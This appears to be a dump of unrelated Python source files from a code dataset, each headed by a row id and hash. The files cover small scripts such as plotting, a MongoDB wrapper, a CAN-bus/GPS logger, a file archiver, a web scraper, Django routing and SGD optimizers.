A = np.array([[4, 9, 2], [8, 1, 6], [3, 5, 7]])
y = np.asarray([[8], [2], [5]])
pre_X = [[55], [10], [23]]
lr = 0.0001
iter = 50
gd = gradientDescent(iter, A, y, pre_X, Encoder, model, lr)
# returns z if z>0 and returns 0 otherwise
for i in range(len(gd)):
for j in range(len(gd[i])):
if gd[i][j] < 0:
gd[i][j] = 0
print(gd)
################### plot the result ###########################################################################
# plt.figure(figsize=(4,4)) #generate figure with a size of 9x4 inches
# # ax=plt.subplot(121)#subplot 1 row 2 columns the first item
# # plt.tricontour(triang, np.squeeze(fnntest))#draw contour lines
# # plt.colorbar()#draw colorbar
# # plt.tricontour(triang, np.squeeze(fnntest))#draw contour lines
# # plt.plot(gd[:,0], gd[:,1], 'r')
# # plt.title("True Objective")#set title
#
# ax=plt.subplot(122)#subplot 1 row 2 columns the second item
# plt.tricontour(triangd, np.squeeze(dlow_dim))#draw contour lines
# plt.colorbar()#draw colorbar
# plt.tricontour(triangd, np.squeeze(dlow_dim))#draw contour lines
# plt.plot(gd[:,0], gd[:,1], 'r')
# plt.title("NN Estimated Objective")
#
# plt.show()
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r',
marker='o')
ax.plot(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r')
surf1 = ax.plot_trisurf(triang, np.squeeze(fnntest), cmap=plt.cm.viridis,
linewidth=0, antialiased=False)
fig.colorbar(surf1, shrink=0.5, aspect=5) # Add a color bar which maps values to colors.
plt.title("True Objective") # set title
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r',
marker='o')
ax.plot(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r')
surf2 = ax.plot_trisurf(triangd, np.squeeze(dlow_dim), cmap=plt.cm.viridis,
linewidth=0, antialiased=False)
fig.colorbar(surf2, shrink=0.5, aspect=5) # Add a color bar which maps values to colors.
plt.title("NN Estimated Objective")
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
plt.show() # show plot (this blocks the code: make sure it's at the end of your code)
|
23,175 | eb0c7cf370a91d5ca03cfea3adac8aba2c3d14b2 | #Tabuada
n = int(input('Digite um numero: '))
cont = 1
while cont <=10:
print('{} x {:2} = {}'.format(n, cont, cont * n))
cont += 1 |
23,176 | f5a02a951d340021229ada22b684f778ba84018c | import os
from pymongo import MongoClient
from pymongo.errors import BulkWriteError
class Database:
def __init__(self, logger):
self.logger = logger
self.__load_db()
def __load_db(self):
self.__set_envs()
self.client = MongoClient(
self.mongo_ip,
self.mongo_port,
username=self.mongo_username,
password=self.mongo_password,
)
database = self.client.tweets_db
self.tweets_collection = database.tweets_collection
self.tweets_collection.create_index("id", unique=True)
def __del__(self):
self.client.close()
def __set_envs(self):
self.mongo_ip = os.environ.get("MONGO_IP", "127.0.0.1")
self.mongo_port = os.environ.get("MONGO_PORT", 27017)
self.mongo_username = os.environ.get("MONGO_USERNAME", "mongo")
self.mongo_password = os.environ.get("MONGO_PASSWORD", "mongopw")
def save(self, data):
try:
result = self.tweets_collection.insert_many(data, ordered=False)
inserted_count = len(result.inserted_ids)
return inserted_count
except BulkWriteError as error:
duplicated_amount = len(error.details["writeErrors"])
inserted_count = error.details["nInserted"]
self.logger.debug(error.details)
self.logger.info(f"Duplicated documents: {duplicated_amount}")
self.logger.info(f"Non-duplicated documents count: {inserted_count}")
return inserted_count
def get_tweets(self):
return self.tweets_collection.find()
|
23,177 | 7aa619c97b426952d95ca2d218cb9369dc2fb4d6 | import click
from epigen.commands.command import CommandWithHelp
from epigen.plink import generate
from epigen.util import probability
@click.command( 'data', cls = CommandWithHelp, short_help="Generates a plink file without a phenotype." )
@click.option( '--maf', nargs=2, type=probability.probability, help='If set MAF is generated uniformly between these two values (default use exp distribution).', default = None )
@click.option( '--nsamples', type=int, help='The number of samples.', default = 2000 )
@click.option( '--nvariants', type=int, help='The number of variants.', default = 10000 )
@click.option( '--create-pair/--no-create-pair', help='Create a .pair file in the output prefix that contains all possible pairs of variants.', default = False )
@click.option( '--out', help='Output plink file.', type=click.Path( writable = True ), required = True )
def epigen(maf, nsamples, nvariants, create_pair, out):
generate.write_single( nvariants, nsamples, out, maf = maf, create_pair = create_pair )
|
23,178 | 21ee0e9f38fb772aa024f6cb2c75be1e10782333 | i=1
while i<=5:
j=1
while j<=i:
print('$',end='' '')
j=j+1
k=1
while k<i:
print('*',end='' '')
k=k+1
print()
i=i+1
# i=5
# while i>=1:
# j=5
# while j>0:
# print(j,end='' '')
# j=j-1
# print()
# i=i-1 |
23,179 | b3a49623585ab87483b39e3b1a33cf08b4c2da35 | #!/usr/bin/python3
import helper_functions as hf
import RPi.GPIO as GPIO
import can
import time
import os
import queue
from threading import Thread
from datetime import datetime
from gps3 import gps3
# initial Raspi setup for CAN Shield interfacing
led = 22
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(led,GPIO.OUT)
GPIO.output(led,True)
# configure Gps
gpsd_socket = gps3.GPSDSocket()
data_stream = gps3.DataStream()
gpsd_socket.connect()
gpsd_socket.watch()
# Bring up can0 interface at 500kbps
os.system("sudo /sbin/ip link set can0 up type can bitrate 500000")
time.sleep(0.1)
try:
bus = can.interface.Bus(channel='can0', bustype='socketcan_native')
except OSError:
print('Cannot find PiCAN board.')
GPIO.output(led,False)
exit()
tx_file = 0
rx_file = 0
def can_rx_task():
while True:
message = bus.recv()
if message.arbitration_id == hf.PID_REPLY:
q_CAN.put(message)
def can_gps_task():
# read GPS data
while True:
for new_data in gpsd_socket:
if new_data:
q_GPS.put(new_data)
break
else:
continue
q_CAN = queue.Queue()
q_GPS = queue.Queue()
rx = Thread(target = can_rx_task)
rx.start()
tx = Thread(target = can_gps_task)
tx.start()
temperature = 0
rpm = 0
speed = 0
throttle = 0
distance = 0
distance_total = 0
time2 = 0
time1 = 0
vspeed2 = 0
vspeed1 = 0
curr_lat = 0
prev_lat = 0
curr_lon = 0
prev_lon = 0
curr_lat_temp = 0
curr_lon_temp = 0
first_time12 = True
logged_data = ''
count = 0
sp_count = 0
time_spent_at_stop = 0.0
time_start_at_stop = 0.0
#file_count = 0
outfile = 0
outfile_name = 0
file_name = ''
DEPOT_BEGIN = True
STARTED_FROM_DEPOT = False
STARTED_FROM_ROUTE = True
RETURN_TO_DEPOT = False
CIRCULATOR = True
FIRST_TIME_START = True
NEW_DATA_START_LOC = False
NEW_DATA_STOP_LOC = False
# Main control starts
try:
file_open = False
while True:
GPIO.output(led,True)
# Send Throttle position request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.THROTTLE,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.THROTTLE:
throttle = round((message.data[3]*100)/255)
# Send Engine RPM request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.ENGINE_RPM,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.ENGINE_RPM:
rpm = round(((message.data[3]*256) + message.data[4])/4)
# Send Vehicle speed request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.VEHICLE_SPEED,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.VEHICLE_SPEED:
speed_timeStamp = time.time()
speed = message.data[3]
vspeed2 = speed
time2 = message.timestamp
logged_data = '{0:f}, {0:f}, '.format(time2,speed_timeStamp)
logged_data += '{0:d}, '.format(rpm) + '{0:d}, '.format(speed) + '{0:d}, '.format(throttle)
# calculate distance
if first_time12:
time1 = time2
vspeed1 = vspeed2
first_time12 = False
# convert speed from km/h to m/s
vspeed1 = vspeed1 * 5 / 18
vspeed2 = vspeed2 * 5 / 18
distance += (vspeed2 + vspeed1)*(time2 - time1)/2
distance_total += (vspeed2 + vspeed1)*(time2 - time1)/2
vspeed1 = vspeed2
time1 = time2
# read GPS data
if q_GPS.empty() == True:
pass
else:
new_data = q_GPS.get()
data_stream.unpack(new_data)
curr_lat = data_stream.TPV['lat']
if curr_lat == 'n/a':
curr_lat = 0;
curr_lon = data_stream.TPV['lon']
if curr_lon == 'n/a':
curr_lon = 0;
curr_lat_temp = curr_lat
curr_lon_temp = curr_lon
if prev_lat == curr_lat and prev_lon == curr_lon:
curr_lat_temp = 0
curr_lon_temp = 0
else:
prev_lat = curr_lat
prev_lon = curr_lon
logged_data += str(curr_lat_temp) + ', ' + str(curr_lon_temp)
logged_data += ', {0:f}, {1:f}'.format(distance_total,distance)
print(logged_data)
except KeyboardInterrupt:
#Catch keyboard interrupt
GPIO.output(led,False)
if file_open:
outfile.close()
tx_file.close()
rx_file.close()
# close CAN interface
os.system("sudo /sbin/ip link set can0 down")
print('\n\rKeyboard interrtupt')
|
23,180 | fb1cc5d39a10ffc100de44880f80aceb7545eaf5 | #-*- coding: utf-8 -*-
import os
import time
import textManager
import rule
#import main #import main이라고 써놔서 main.py에서 여기로 넘어올떄 충돌생기는것 같아서 주석처리했습니다. ( by 계)
def printStudentinfo(code):
#학생정보출력
os.system('cls')
print("=" * 18, end='')
print("[마이페이지]", end='')
print("=" * 21)
myInfo=textManager.readText_Student_c(code) #code학번학생의 정보 배열 받아옴
print(myInfo[1] + " ( " + myInfo[0] + " ) ")
print("hp : " + myInfo[2])
print("수강내역")
classArr=textManager.Re_UserInfo(code)
for i in range(len(classArr)):
print(' - '+classArr[i][1]) # @를 띄어쓰기로 치환후 출력 #강의 정보들 출력!
print("="*50)
return myInfo
def printTeacherinfo(code):
#선생님정보출력
os.system('cls')
print("=" * 18, end='')
print("[마이페이지]", end='')
print("=" * 21)
myInfo=textManager.readText_Teacher_c(code) #code학번학생의 정보 배열 받아옴
print(myInfo[1]+" ( "+myInfo[0]+" ) ")
print("hp : "+myInfo[2])
print("개설강의")
classArr=textManager.Re_UserInfo(code)
for i in range(len(classArr)):
print(' - '+classArr[i][1]) # @를 띄어쓰기로 치환후 출력 #강의 정보들 출력!
print("="*50)
return myInfo
def modifyInfo(code,myInfo):
#정보수정화면
while True:
printModifyinfo(code)
print("1. 이름수정\n2. 전화번호수정\n3. 뒤로가기")
choice = input("원하시는 항목을 선택해 주세요 : ") or '입력 실패'
if choice == '입력 실패':
print("데이터 값을 입력해 주세요.")
time.sleep(2)
os.system('cls')
continue
elif rule.numberRule(choice)==0: #숫자입력규칙 적용, import main 주석처리해서 __import__로 즉석해서 import함
time.sleep(2)
os.system('cls')
return 0
elif choice == '1':
if modifyName(code,myInfo)==1:
print("정보가 성공적으로 수정되었습니다.")
time.sleep(2)
os.system('cls')
#마이페이지 화면으로 돌아갑니다.
return 0
elif choice == '2':
if modifyPhone(code,myInfo)==1:
print("정보가 성공적으로 수정되었습니다.")
time.sleep(2)
os.system('cls')
# 마이페이지 화면으로 돌아갑니다.
return 0
elif choice == '3':
return 0
else:
print("선택지 내의 숫자를 입력하여주세요")
time.sleep(2)
os.system('cls')
#printModifyinfo(code) 기획서에 맞게 수정(by최)
return 0
def printModifyinfo(code):
#정보수정화면 정보 출력화면
os.system('cls')
print("=" * 18, end='')
print("[정보 수정]", end='')
print("=" * 21)
if code[0] == 'S':
myInfo = textManager.readText_Student_c(code)
else:
myInfo = textManager.readText_Teacher_c(code)
print(myInfo[1] + " ( " + myInfo[0] + " ) ")
print("hp : " + myInfo[2])
print("=" * 50)
def modifyName(code,myInfo):
#이름수정
print(myInfo[1], end="")
newName = input(">>>") or '입력 실패'
if len(newName) > 10:
print("형식에 어긋납니다. 다시 입력하십시오")
time.sleep(2)
os.system('cls')
return 0
elif newName=='입력 실패':
print('변경할 값을 입력해주십시오')
time.sleep(2)
os.system('cls')
return 0
else:
textManager.RenewalName(code, myInfo[1], newName) #수정!
return 1
def modifyPhone(code,myInfo):
#전화번호수정
print(myInfo[2], end="")
newPhone = input(">>>") or '입력 실패'
if len(newPhone) == 11 and newPhone.isdecimal(): # type(newPhone)=='int' int로 하면 len이 안되는거 같아오
# 전화번호수정하고
textManager.RenewalName(code, myInfo[2], newPhone) #수정!
return 1
elif newPhone=='입력 실패':
print("데이터 값을 입력해 주세요")
time.sleep(2)
os.system('cls')
return 0
else:
print("형식에 맞게 다시 입력하십시오")
time.sleep(2)
os.system('cls')
return 0
def screen(code):
while True:
# 메인화면 출력
if code[0]=='S':
myInfo=printStudentinfo(code)
else:
myInfo =printTeacherinfo(code)
print("1. 정보수정\n2. 뒤로가기")
choice = input("원하시는 항목을 선택해 주세요 : ") or '입력 실패'
if choice=='입력 실패':
print('데이터 값을 입력해 주세요.')
time.sleep(2)
os.system('cls')
continue
#숫자입력규칙
elif rule.numberRule(choice)==0: #숫자입력규칙 적용, import main 주석처리해서 __import__로 즉석해서 import함
time.sleep(2)
os.system('cls')
continue
#메뉴 분기
elif choice == '1':
#"1. 정보수정" 이동
os.system('cls')
modifyInfo(code, myInfo)
elif choice == '2':
#"2. 뒤로가기" 이동
return 0
else:
print("선택지 내의 숫자를 입력하여주세요") # 숫자입력규칙 적용필요
time.sleep(2)
os.system('cls')
continue |
23,181 | 8384bc3e8af76f66ff89c79b94dd89484e7a46ce |
import sys, os
from os import walk
from os import listdir
from os.path import isfile, join
import shutil
import time
import getopt
import re #RegEx
#import yaml
class ArchiveFiles:
def __init__(self, date):
#Initializes a dict called job
self.date = date
def _backupLog(self, updateText):
""" Function used to log actions (copied files, deleted files, etc)."""
aFile = "archiving_log.txt"
os.rename( aFile, aFile+"~")
destination= open( aFile, "w" )
source= open( aFile+"~", "r" )
for line in source:
destination.write( line )
destination.write( str(updateText))
source.close()
destination.close()
os.remove(aFile+"~")
# 2) Copy Data
#Should copy data to other folder, and log the name of copied file into backup file
#Should implement only to files with certain dates
def _archiveData(self, src, dest):
"""Goes through files inside directory structure ."""
root = os.getcwd()
srcPath = join(root,src)
destPath = join(root,dest)
f = [] #Array with list of files to copy
s = [] #Array with list of files successfully copied
for (dirpath, dirnames, filenames) in walk(srcPath):
f.extend(filenames)
if len(f) > 0:
for i in f:
if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py':
try:
buffer_size = int(20000)
fileSrcPath = join(dirpath, i)
fileDestPath = join(destPath, i)
with open(fileSrcPath, 'rb') as fsrc:
with open(fileDestPath, 'wb') as fdest:
copy = shutil.copyfileobj(fsrc,fdest,buffer_size)
copy
self._backupLog('Copy Operation File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\t'+ 'Path: '+ str(srcPath)+'\n')
s.append(i)
except shutil.Error as e:
self._backupLog('Error: %s' % e + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except IOError as e:
self._backupLog('Error: %s' % e.strerror + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
if len(s) >0:
for (dirpath,dirnames,filenames) in walk(srcPath):
for cfile in f:
for sfile in s:
if cfile == sfile:
try:
filetoDelete = join(srcPath, cfile)
os.remove(filetoDelete)
self._backupLog('Delete Operation File: '+str(cfile)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except OSError, e:
self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
def _archiveDataByDate(self, src, dest):
"""Goes through files inside directory structure ."""
root = os.getcwd()
srcPath = join(root,src)
destPath = join(root,dest)
f = [] #Array with list of files in directory
fDate = [] #Array with list of files with certain date;
s = [] #Array with list of files successfully copied
for (dirpath, dirnames, filenames) in walk(srcPath):
f.extend(filenames)
if len(f) > 0:
for i in f:
match = re.search(r'\d{4}-\d{2}-\d{2}', i)
if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:
try:
buffer_size = int(20000)
fileSrcPath = join(dirpath, i)
fileDestPath = join(destPath, i)
with open(fileSrcPath, 'rb') as fsrc:
with open(fileDestPath, 'wb') as fdest:
copy = shutil.copyfileobj(fsrc,fdest,buffer_size)
copy
self._backupLog('Copy Operation File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) +'\n') #+ '\t'+ 'Path: '+ str(srcPath)
s.append(i)
except shutil.Error as e:
self._backupLog('Error: %s' % e + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except IOError as e:
self._backupLog('Error: %s' % e.strerror + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
if len(s) >0:
for (dirpath,dirnames,filenames) in walk(srcPath):
for cfile in f:
for sfile in s:
if cfile == sfile:
try:
filetoDelete = join(srcPath, cfile)
os.remove(filetoDelete)
self._backupLog('Delete Operation File: '+str(cfile)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except OSError, e:
self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
def Run(self):
"""Executes the job."""
src = 'testFolder'
dest = 'testFolder2'
self._backupLog('\n' + 'Starting Archiving Job - Archiving Files of date: ' + str(time.strftime("%Y-%m-%d")) + '\n' )
self._backupLog('Archiving Job Start Time: ' + str(time.strftime("%H:%M:%S")) + '\n' )
self._archiveDataByDate(src,dest)
self._backupLog('\n' + 'Archiving Job End Time: ' + str(time.strftime("%H:%M:%S")) + '\n' )
#End of Class ArchiveFiles
def main():
"""Main function of the script that executes all necessary functions."""
today = str(time.strftime("%Y-%m-%d"))
#today = '2014-10-25'
date = today
try:
#User can specify himself the keys or let system read from local file.
opts, args = getopt.getopt(sys.argv[1:], '', ['date='])
except getopt.error, msg:
print 'python archivingScript.py --date [dateToArchive]'
sys.exit(2)
for option, arg in opts:
if option == '--date':
date = arg
job = ArchiveFiles(date)
job.Run()
if __name__ == '__main__':
main()
|
23,182 | d5e683c1f31d9c43f3aee00a8db856332b68f7a0 | """
https://github.com/Voronenko/ansible-developer_recipes/tree/master/ansible_extras
Description: This lookup takes an AWS region and an s3 bucket name.
Example Usage:
{{ lookup('aws_s3_bucket_exists', 'bucketname') }}
"""
from __future__ import (absolute_import, division, print_function)
from ansible.errors import (AnsibleError, AnsibleLookupError)
from ansible.plugins.lookup import LookupBase
import os
__metaclass__ = type
if os.getenv('AWS_ACCESS_KEY_ID') is not None:
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
if os.getenv('AWS_SECRET_ACCESS_KEY') is not None:
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
try:
from boto.s3.connection import S3Connection
except ImportError:
raise AnsibleError("aws_vpc_id_from_name lookup cannot be run without boto installed")
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
if isinstance(terms, basestring):
terms = [terms]
bucket_name = terms[0]
conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
bucket = conn.lookup(bucket_name)
if bucket is None:
raise AnsibleLookupError("Bucket %s not found" % bucket_name)
return [bucket_name.encode('utf-8')]
|
23,183 | 54134da8f8cc8f72e3dea15f8584c488339552a3 | import requests
from login import login
from utils import get_url_info
from utils import get_jsonstring_info
import init_fund_account_in_db
import advertising
import del_ads_in_db
currency_tuple = ('BYC', 'BTC', 'ETH', 'KBC', 'NZ', 'USDT')
#payment_dict = {"bankcard": 1, "Alipay": 2, "WeChatPay": 4}
def getBuyAdList(user_name='17727820013', password='123456', currency=None):
"""
获取商家发布的广告求购单列表
"""
try:
ad_order_list = []
mytoken = login(login_num=user_name, password=password)["data"]["token"]
headers = {"token": str(mytoken)}
for each_page in range(1, 10):
jsonString = get_jsonstring_info.get_buy_ad_list_jsonString %(repr(currency), each_page)
data = dict(jsonString=jsonString)
r = requests.post(get_url_info.get_ad_list_url, data=data, headers=headers)
ad_order_list.extend(r.json()['data']['list'])
return [x['advertisingOrderId'] for x in ad_order_list]
except Exception as err:
print(err)
def getSellAdList(user_name='17727820013', password='123456', currency=None):
"""
获取商家发布的广告卖单列表
"""
try:
ad_order_list = []
mytoken = login(login_num=user_name, password=password)["data"]["token"]
headers = {"token": str(mytoken)}
for each_page in range(1, 10):
jsonString = get_jsonstring_info.get_sell_ad_list_jsonString %(repr(currency), each_page)
data = dict(jsonString=jsonString)
r = requests.post(get_url_info.get_ad_list_url, data=data, headers=headers)
ad_order_list.extend(r.json()['data']['list'])
return [x['advertisingOrderId'] for x in ad_order_list]
except Exception as err:
print(err)
if __name__ == "__main__":
"""
print("......初始化法币资金账户的NZ......")
init_fund_account_in_db.initUserFundAccount(fund_type='UserCoin2CoinFunds',
user_name='手机商家', currency='NZ', available_balance=10000, frozen_balance=0)
print('......发布11条1CNY的广告......')
for i in range(11):
advertising.limitedPriceBuyAd(user_name="17727820013", currency="NZ", price=1, amount=1000,
floor=100, ceiling=1000)
"""
print('......获取这些广告id......')
#r = getMerchantBuyAd(user_name='17727820013', password='123456', currency='NZ')
#print(r)
"""
for i in [x["advertisingOrderId"] for x in r if (x['type'] == 2)]:
print(i)
"""
advertising.limitedPriceBuyAd(currency='BTC', price=1, amount=1000, floor=1, ceiling=1000)
advertising.marketPriceSellAd(currency='BTC', amount=1000, floor=1, ceiling=1000)
r1 = getBuyAdList(user_name='17727820013', password='123456', currency='BTC')
print(r1)
r2 = getSellAdList(currency='BTC')
print(r2)
|
23,184 | 35ab1487834fd190e0e07d97f3b9b6ebbb5553ea | f = open('input12.txt','r')
pos = [0,0]
dir = [1,0]
def dir_change(cdir, change):
if change[1:3] == '18':
return [-cdir[0],-cdir[1]]
elif change == 'R90' or change == 'L27':
return [cdir[1],-cdir[0]]
elif change == 'L90' or change == 'R27':
return [-cdir[1],cdir[0]]
for l in f.readlines():
if l[0] == 'N':
pos[1] += int(l[1:-1])
elif l[0] == 'S':
pos[1] -= int(l[1:-1])
elif l[0] == 'E':
pos[0] += int(l[1:-1])
elif l[0] == 'W':
pos[0] -= int(l[1:-1])
elif l[0] == 'F':
pos[0] += int(l[1:-1])*dir[0]
pos[1] += int(l[1:-1])*dir[1]
elif l[0] == 'R' or l[0] == 'L':
dir = dir_change(dir,l[:3])
print("part 1 sol = " + str(abs(pos[0]) + abs(pos[1])))
f.close()
# PART 2
f = open('input12.txt','r')
def dir_change_wp(cdir, change):
if change[1:3] == '18':
return [-cdir[0],-cdir[1]]
elif change == 'R90' or change == 'L27':
return [cdir[1],-cdir[0]]
elif change == 'L90' or change == 'R27':
return [-cdir[1],cdir[0]]
ship = [0,0]
wp = [10,1]
for l in f.readlines():
if l[0] == 'N':
wp[1] += int(l[1:-1])
elif l[0] == 'S':
wp[1] -= int(l[1:-1])
elif l[0] == 'E':
wp[0] += int(l[1:-1])
elif l[0] == 'W':
wp[0] -= int(l[1:-1])
elif l[0] == 'F':
ship[0] += int(l[1:-1])*wp[0]
ship[1] += int(l[1:-1])*wp[1]
elif l[0] == 'R' or l[0] == 'L':
wp = dir_change_wp(wp,l[:3])
print("part 2 sol = " + str(abs(ship[0]) + abs(ship[1])))
|
23,185 | ac58f4e8a6b4f3af7d14b156c595a9cbfed70b45 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from meimeiproject.items import MeimeiprojectItem
import urllib.request
import urllib.parse
import re
class MeituSpider(CrawlSpider):
name = 'meitu'
allowed_domains = ['www.meizitu.com']
start_urls = ['http://www.meizitu.com/a/more_1.html']
rules = (
Rule(LinkExtractor(allow=r'more_\d+\.html'), callback='parse_table', follow=True),
)
def parse_table(self, response):
div_list = response.xpath('//div[@class="inWrap"]/ul[@class="wp-list clearfix"]/li[@class="wp-item"]')
for div in div_list:
item = MeimeiprojectItem()
# item['info'] = div.xpath('./div[@class="con"]/div[@class="pic"]/a/img/@alt').extract_first()
link = div.xpath('./div[@class="con"]/div[@class="pic"]/a/@href').extract_first()
# yield item
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
yield scrapy.Request(url=link, callback=self.parse_info, meta={'item': item}, headers=headers)
def parse_info(self, response):
# 获取到传递过来的参数
item = response.meta['item']
# 接着解析网页,获取item的其它信息
# item['tags'] = response.xpath('//div[@class="postmeta clearfix"]/div[@class="metaRight"]/p/text()').extract_first()
div_list = response.xpath('//div[@class="postContent"]/div[@id="picture"]/p')
for div in div_list:
name_list = div.xpath('./img/@alt').extract()
image_list = div.xpath('./img/@src').extract()
# for image in image_list:
# item['image_url'] = image
# for name1 in name_list:
# item['name'] = name1
# yield item
for i in range(len(image_list)):
item['image_url'] = image_list[i]
item['name'] = name_list[i]
yield item
|
23,186 | ce3f5d6bda306b003650beb7257fb7149ccd9c34 | def raindrops(number):
drops = {
3: 'Pling',
5: 'Plang',
7: 'Plong',
}
sound = [drops[n] for n in drops if number % n == 0]
return ''.join(sound) or str(number)
|
23,187 | 57f8967ae98065a695245dffe01a179adbf739a3 | from django.urls import path
from . import views
# Namespace
app_name = 'app'
urlpatterns = [
# "/app"
path('', views.index, name='index'),
path('<int:question_id>/', views.detail, name='detail'),
path('<int:question_id>/results/', views.results, name='results'),
path('<int:question_id>/favorite/', views.favorite, name='favorite')
]
|
23,188 | ea23d4543a500b7d6fd6609311744b208f90f6fd | studentsScores = []
averages = []
amount_of_student = int(input("How many students are there? "))
for i in range(1,amount_of_student+1):
print("Student",i)
midterm1 = float(input("Enter your first midterm:"))
midterm2 = float(input("Enter your second midterm:"))
final = float(input("Enter your final score:"))
studentsScores.append([midterm1,midterm2,final])
print(studentsScores)
for i in studentsScores:
avg = 0
avg = avg + i[0] * 0.3
avg = avg + i[1] * 0.3
avg = avg + i[2] * 0.4
averages.append([avg])
print("Average of students points", averages)
clevers =[]
for z in range(1,len(averages)+1):
if averages[z-1][0] >= 90:
clevers.append(["Student",str(z),averages[z-1]])
print(clevers)
|
23,189 | f60efa75d3978a9fb4b720cf04522d267c1562f7 | from matplotlib import pyplot as plt
if __name__ == '__main__':
plt.style.use('fivethirtyeight')
slices = [59219, 55466, 47544, 36443, 35917, 31991, 27097, 23030, 20524, 18523, 18017, 7920, 7331, 7201, 5833]
labels = ['JavaScript', 'HTML/CSS', 'SQL', 'Python', 'Java', 'Bash/Shell/PowerShell', 'C#', 'PHP', 'C++',
'TypeScript', 'C', 'Other(s):', 'Ruby', 'Go', 'Assembly']
# colors = ['#008fd5', '#fc4f30', '#e5ae37', '#6d904f']
explode = [0, 0, 0, 0.2, 0]
plt.pie(
slices[:5],
labels=labels[:5],
shadow=True,
startangle=90,
explode=explode,
wedgeprops={'edgecolor': 'black'},
autopct='%1.1f%%'
)
plt.title("Pie Chart")
plt.tight_layout()
plt.show()
|
23,190 | cdfd3f7b7726585399de5a6857624c127ca969dc |
class ABCSummary:
"""A wrapper class over the user-defined summary func."""
def __init__(self, summary):
self.summary = summary
def summarize(self, data):
"""Compute and return summary statistics from data."""
return self.summary(data).flatten()
|
23,191 | d9553623dd146834f518b5f379001585b339cf41 |
from __future__ import print_function
import numpy as np
class SGD ():
def __init__(self, params, lr=0.001, reg=0):
self.parameters = params
self.lr = lr
self.reg = reg
def step(self):
for param in self.parameters:
param['val'] -= (self.lr*param['grad'] + self.reg*param['val'])
class SGDMomentum ():
def __init__(self, params, lr=0.001, momentum=0.99, reg=0):
self.l = len(params)
self.parameters = params
self.velocities = []
for param in self.parameters:
self.velocities.append(np.zeros(param['val'].shape))
self.lr = lr
self.rho = momentum
self.reg = reg
def step(self):
for i in range(self.l):
self.velocities[i] = self.rho*self.velocities[i] + (1-self.rho)*self.parameters[i]['grad']
self.parameters[i]['val'] -= (self.lr*self.velocities[i] + self.reg*self.parameters[i]['val'])
|
23,192 | 6020a503cfef566cee55d6dc42751465fb981951 | count = 10 #עובר על כל המספרים הדו ספרתיים (10-99), ומדפיס את סכום המספרים שמסתיימים בספרה 0
sum = 0
while count>9 and count<100:
if count%10 == 0:
sum += count
count +=1
print(sum) |
23,193 | 438fbe201d8e24ab722a983220474666e87b735e | # https://developers.google.com/edu/python/regular-expressions
# https://docs.python.org/3/howto/regex.html
'''
Check out the following links for more information:
https://docs.python.org/3/howto/regex.html
https://docs.python.org/3/library/re.html
https://docs.python.org/3/howto/regex.html#greedy-versus-non-greedy
Shout out to https://regex101.com, which will explain each stage of a regex.
https://regexcrossword.com/
'''
import re
'''
search('r'pattern,text) : serach pattern in test, 'r' flag = raw string. which passes through backslashes without change which is very handy for regular expressions
importance of rflag
in particular, \b matches empty string specifically at the start and end of a word.
re expects the string \b, however normal string interpretation '\b' is converted to the ASCII backspace character,
so you need to either explicitly escape the backslash ('\\b'), or tell python it is a raw string (r'\b').
'''
